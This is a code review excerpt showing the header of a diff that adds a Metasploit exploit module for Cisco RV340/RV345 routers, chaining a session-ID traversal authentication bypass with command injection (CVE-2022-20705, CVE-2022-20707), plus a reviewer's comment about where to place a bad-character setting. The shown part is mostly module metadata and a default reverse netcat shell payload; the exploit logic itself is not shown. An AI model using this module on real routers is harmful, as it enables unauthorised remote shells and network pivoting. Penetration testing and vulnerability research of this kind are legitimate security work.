modules/exploits/linux/http/cisco_rv340_lan.rb

```diff
@@ -0,0 +1,190 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Cisco RV34X Series Authentication Bypass and Command Injection',
+        'Description' => %q{
+          This module exploits two vulnerabilities, a session ID directory traversal authentication
+          bypass (CVE-2022-20705) and a command injection vulnerability (CVE-2022-20707), on Cisco RV340 and RV345
+          Small Business Routers, allowing attackers to gain remote shell access with www-data user privileges.
+          This access can then be used to pivot to other parts of the network. This module works on firmware
+          versions 1.0.03.24 and below.
+        },
+        'License' => MSF_LICENSE,
+        'Platform' => ['linux', 'unix'],
+        'Author' => [
+          'Biem Pham',  # Vulnerability Discoveries
+          'Neterum',    # Metasploit Module
+          'jbaines-r7'  # Inspired from cisco_rv_series_authbypass_and_rce.rb
+        ],
+        'DisclosureDate' => '2021-11-02',
+        'Arch' => [ARCH_CMD, ARCH_ARMLE],
+        'References' => [
+          ['CVE', '2022-20705'], # Authentication Bypass
+          ['CVE', '2022-20707'], # Command Injection
+          ['ZDI', '22-410'], # Authentication Bypass
+          ['ZDI', '22-411']  # Command Injection
+        ],
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'Payload' => {},
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_netcat',
+                'BadChars' => '\''
```

Comment:
We should move this into the `Payload` section as I think that is the proper place for this.